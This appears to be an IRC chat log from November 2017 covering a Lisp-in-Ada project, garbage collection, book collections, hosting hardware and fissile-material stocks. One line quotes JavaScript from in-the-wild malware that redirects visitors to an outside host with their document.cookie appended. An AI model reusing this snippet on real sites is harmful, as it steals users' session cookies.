asciilifeform: on sane iron, gc really oughta be part of the iron. but that's whole other thread.
spyked: ^ and if it does, should be easy to plug it in.
asciilifeform: ( if your script runs for long enough that it needs gc -- maybe it oughta instead be an actual proggy ? ) ☟︎
asciilifeform: i'm not fully convinced that a scripting lang ~needs~ a gc ☟︎☟︎
spyked: at least once it goes out of memory it will scream, unlike tinyscheme buffer overflows.
spyked: I'm also keeping the idea of potentially embedding in other ada projects (e.g. adacoin?) in mind. but so far wrestling the ffa aspects were enough of a challenge. oh, and there's no gc yet, the thing leaks memory like hell. but that's not its biggest problem.
asciilifeform: but that ~itself~ weighs very little
asciilifeform: and get something in which one might write things like http://www.loper-os.org/?p=1762
asciilifeform: ( i'd quite like to perma-anathemize python,perl,all the multi-GB-pots-of-liquishit )
asciilifeform: http://btcbase.org/log/2017-11-12#1736759 << linked item is unpleasantly reminiscent of the 'artificially smoked' sprats that flooded the market in the early 2000s ☝︎
spyked: yes. hopefully more than that in the long term (item to be manually translated to e.g. fpga implementation)
spyked: in other news, I've been using most of my spare cycles lisping in ada. should be able to wrap up a blog post sharing a very minimal prototype (sane implem. of repl doing nothing but basic ops) in a few weeks. what I've got now adheres to most of ffa constraints. the current version isn't very clean, but getting there... ☟︎
asciilifeform: and the parts of usa that it ~isn't~ two notches ahead of, asciilifeform will never live in
asciilifeform: at least written in terms of 'bang per buck'
asciilifeform: and for that matter most of usa
asciilifeform: it's still a notch or two ahead of, e.g., chicago
asciilifeform: ( where, e.g., sidewalks can be walked on, rather than used as ad hoc orc parking lot )
asciilifeform: enjoyed timis far moar ftr.
spyked missed quite a lot while in read-only mode. glad to hear you enjoyed bucharest, asciilifeform. unexpected also. fortunately you didn't see it on weekdays.
spyked: hi! sorry for the radio silence. I've been working myself out of various irl swamps lately (still in progress). following in read-only mode though. ☟︎
asciilifeform: ( where they went ? unknown, prolly burned )
a111: Logged on 2017-11-12 20:28 mircea_popescu: irl i held ~10k tomes at home + 1.5mn or so held by the univ library for me
asciilifeform: http://btcbase.org/log/2017-11-12#1736763 << at one time asciilifeform also naively thought 'u of md keeps 1mil b00ks for me!11' -- even paid a subscription fee. which then went up, and max b00k loan time went from 6mo to 3mo to 1mo... and went up again.. and the most recent insult, they abolished 80% of the contents of the library floor asciilifeform frequented ☝︎
asciilifeform: ( who mines u today ? and, gotta wonder, how -- i can't picture it outside of butugychag-style 'fat-powered' op )

asciilifeform: http://btcbase.org/log/2017-11-12#1736787 << ah hm iirc nao su did not stash u, it stashed pu -- and most of it 'sold' to usg in '90s for pennies ☝︎
lobbes: BingoBoingo, I actually do have root on the VPSen I currently wield, but it would be nice to have my stuff on a box owned by someone I trust. Anyways, I'll keep my eyez to the logs as maths unfold
mircea_popescu: davout evidently, whosoever got it back to 2 neh.
mircea_popescu: and in the latest "malware" seen in the wild, function go(){open(document.forms[6].action,MyWin);document.getElementById('pop').style.display='none';document.location.href='http://baikalqx.beget.tech/test/?t=popad4&coco='+document.cookie;}

mircea_popescu: http://btcbase.org/log/2017-11-12#1736723 << he has a point, at that. ☝︎
BingoBoingo: Having one booked up and in luggage would be helpful to ISP cause.
BingoBoingo: trinque: The build a blade thing: http://www.buildablade.com/bb-itx96.htm
BingoBoingo: lobbes: A box for VPS is very probable, that price point is probably not happening. Then again, this will be a week of much math. On the other hand, wouldn't it be nice to have root?
lobbes: http://btcbase.org/log/2017-11-12#1736751 << I'd be interested in possibly renting some hosting as a VPS type of arrangement. My projects are low-overhead as well, though. currently, I only pay ~$10USD per month for the two VPSes I rent ☝︎
BingoBoingo: Datacenter is close to beaches, so vacation drop off is also option
BingoBoingo: That is doable. Still gotta rent space, heat handling, and access to net
BingoBoingo: Could also do humble blade around PC Engines APU board. Idea is minimal viable machine for lord of aspiring lordling to make home while possessing root login.
BingoBoingo: trinque: Racking 1u will give more freedom to spec box, get ECC RAM
trinque will review logs to not duplicate details
BingoBoingo: trinque: Blade would be built around BIOSTAR A68N-5545 shoved into "Build a Blade" enclosure linked earler. Some assembly required, but not experimental hardware at the ranch.
trinque: BingoBoingo: got a link to that blade you were talking about?
mircea_popescu: but then again, humanities book needs > technical.
mircea_popescu: (in theory it's "for everyone", but in practice you're lucky if you get 1 user per mn books. cuz wtf do people want with them.)
mircea_popescu: irl i held ~10k tomes at home + 1.5mn or so held by the univ library for me ☟︎

trinque: asciilifeform: take a picture of the book spines before selling, for teh uneducated youf ☟︎
asciilifeform: pretty sure i retired the last rust hdd...
pete_dushenski: probably petabytes of txt and scanned wares
pete_dushenski: phf: i can see that. also, asciilifeform likely has a crate with spinning rust hdd's containing a vault's worth of digital tomes.
asciilifeform: the 300 figure is closer to what i aim for in the launch capsule.
asciilifeform: BingoBoingo: orig link is quite nonsensical tho : ru is ~exporter~ not importer of fissiles ☟︎
phf: pete_dushenski: that's a common misconception, i suspect asciilifeform's library consists of like 200-300 books, that are heavily annotated, because other books, while really nice to have, is a pain in the ass to manage, so you just cull to the current essentials and somehow source whatever's missing later.
a111: Logged on 2017-11-12 14:43 mircea_popescu: http://btcbase.org/log/2017-11-12#1736360 << and i suppsoe this is going to be news, not the direct result of http://trilema.com/2016/to-be-clear-hillary-clinton-lost-the-presidential-election-on-june-16th-2016/ in any way shape or form and besides what proof do i have.
BingoBoingo: http://btcbase.org/log/2017-11-12#1736437 << They can't handle the truth ☝︎
pete_dushenski: ya not saying don't prioritise, just hard to imagine that you have only bolix and encyclopediae that qualify as "uniques/rarities". you're like a walking library and nihil fit ex nihilo. in my mind your library looks like http://images.mentalfloss.com/blogs/wp-content/uploads/2012/05/6551303327_bb9ac1f5d6_z-565x376.jpg
asciilifeform: at any rate, can't say that it's a very urgent thing -- prolly >1yr to launch day, for asciilifeform
asciilifeform: because wtf, it isn't worth ~my~ time to catalogue every old toaster in the kitchen, and everypiece of dead tree rubbish that one could get for fiddycents from 'bookfinder' etc
pete_dushenski: why do you always guess what other ppl will be interested in ? i really do think you'd be surprised if you stopped with the commentary and just listed everything ☟︎
asciilifeform: prolly the 1 item that might interest people is the full set of bolix docs
asciilifeform: ah no that's not done yet
pete_dushenski: link to list of dead tree cubometres ? musta missed it
asciilifeform: listed most of what's worth talking about, in the log.
asciilifeform: ( the , dunno, 50, cubometres of dead tree, say )
asciilifeform: most of it not worth cost of transport
pete_dushenski: but with "railcar" of goodies, surely there's something for everyone
asciilifeform: lol i can't resist asking, which item(s) tempt pete_dushenski
pete_dushenski is finally back in the saddle after a whirlwind tour of the four corners of his home "country"
